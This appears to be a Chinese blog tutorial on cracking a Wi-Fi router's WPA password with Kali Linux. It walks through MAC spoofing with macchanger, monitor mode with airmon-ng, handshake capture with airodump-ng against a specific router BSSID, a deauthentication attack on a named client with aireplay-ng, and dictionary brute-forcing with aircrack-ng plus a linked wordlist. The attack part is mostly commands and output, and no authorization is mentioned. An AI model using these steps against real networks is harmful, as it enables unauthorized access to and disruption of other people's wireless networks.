目录

一、购买无线网卡

 二、插上无线网卡

三、连接我们的无线网卡​编辑

四、可移动设备没有出现网卡信息

五、windows无法启动VMware USB Arbitration Service服务

 六、查看当前系统中的无线网络接口

七、修改wlan0接口的MAC地址

八、重新启动wlan0

九、捕获数据包

 十、对无线路由器6C 205-1进行攻击

十一、破解密码

 十二、密码破解总预览图


一、购买无线网卡

我使用的是RT3070L芯片Ralink 802.11 n网卡

 二、插上无线网卡

弹出如下窗口

三、连接我们的无线网卡

四、可移动设备没有出现网卡信息

  1. 如果出现以下情况,是因为windows无法启动VMware USB Arbitration Service 服务的问题
  2.  win+r输入services.msc回车
  3. 找到 VMware USB Arbitration Service 服务,然后右击鼠标点击启动

五、windows无法启动VMware USB Arbitration Service服务

如果出现无法启动的情况,建议安装vmware17的版本,vmware16会出现这种情况 。                vmware17下载地址:

Download VMware Workstation Prohttps://www.vmware.com/products/workstation-pro/workstation-pro-evaluation.html

 六、查看当前系统中的无线网络接口

旧版命令:用airmon-ng来查看当前系统中的无线网络接口

 新版命令:用iwconfig来查看当前系统中的无线网络接口,一定要有wlan口

七、修改wlan0接口的MAC地址

┌──(root㉿kali)-[/home/kexiaohua]
└─# airmon-ng stop wlan0 

PHY     Interface       Driver          Chipset

phy2    wlan0           rt2800usb       Ralink Technology, Corp. RT2870/RT3070

You are trying to stop a device that isn't in monitor mode.
Doing so is a terrible idea, if you really want to do it then you
need to type 'iw wlan0 del' yourself since it is a terrible idea.
Most likely you want to remove an interface called wlan[0-9]mon
If you feel you have reached this warning in error,
please report it.

或者

┌──(root㉿kali)-[/home/kexiaohua]
└─# ifconfig wlan0 down

修改MAC地址:

┌──(root㉿kali)-[/home/kexiaohua]
└─# macchanger --mac 00:11:22:33:44:55 wlan0
Current MAC:   16:3f:e9:41:d1:36 (unknown)  #当前的MAC
Permanent MAC: 7c:dd:90:1a:76:04 (Shenzhen Ogemray Technology Co., Ltd.) #永久的MAC
New MAC:       00:11:22:33:44:55 (CIMSYS Inc) #新的MAC

八、重新启动wlan0

┌──(root㉿kali)-[/home/kexiaohua]
└─# airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    801 NetworkManager
   3015 wpa_supplicant

PHY     Interface       Driver          Chipset

phy2    wlan0           rt2800usb       Ralink Technology, Corp. RT2870/RT3070
                (mac80211 monitor mode vif enabled for [phy2]wlan0 on [phy2]wlan0mon)
                (mac80211 station mode vif disabled for [phy2]wlan0)

九、捕获数据包

1、airodump-ng wlan0mon  #监听所有路由器

 2、airodump-ng-c 4--bssid 路由器MAC地址-w maoge wlanOmon 

-c 被攻击者路由器的信道(CH)  -w表示写入的文件夹名字 --bssid(BSSID)

airodump-ng -c 6 --bssid B8:8E:82:77:66:AC -w /home/kexiaohua/桌面/mima/ wlan0mon

注意:‘/home/kexiaohua/桌面/mima’后面一定要加上'/'否则会直接将捕获的数据包放在桌面上,而不是mima的目录下

 十、对无线路由器6C 205-1进行攻击

aireplay-ng -0 5 -a路由器BSSID-c被踢的人的mac地址 wlan0mon

-0  后面表示攻击次数

aireplay-ng -0 5 -a B8:8E:82:77:66:AC -c 18:F2:2C:20:F4:E9 wlan0mon

我们选择第一个STATION

┌──(root㉿kali)-[/home/kexiaohua]
└─# aireplay-ng -0 5 -a B8:8E:82:77:66:AC -c 18:F2:2C:20:F4:E9 wlan0mon
14:55:45  Waiting for beacon frame (BSSID: B8:8E:82:77:66:AC) on channel 10
14:55:46  wlan0mon is on channel 10, but the AP uses channel 6

出现以上问题的原因是:这段信息是关于无线网络的。它表示正在等待接收到BSSID为B8:8E:82:77:66:AC的信号,该信号使用的是10频道。接下来的信息表示当前无线网卡wlan0mon已经切换到了10频道,但是要连接的AP使用的是6频道,因此无法连接。

所以,我们将airodump-ng wlan0mon给终止改成airodump-ng wlan0mon -c 6

重新运行aireplay-ng -0 5 -a B8:8E:82:77:66:AC -c 18:F2:2C:20:F4:CF wlan0mon

十一、破解密码

aircrack—ng—w 字典路径  握手包路径,回车后开始爆破

 密码字典我放在桌面上了

密码字典下载:https://download.csdn.net/download/kekechengxiao/87824528?spm=1001.2014.3001.5503

aircrack-ng -w /home/kexiaohua/桌面/mima.txt /home/kexiaohua/桌面/mima/-01.cap

破解成功

 十二、密码破解总预览图

Logo

开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!

更多推荐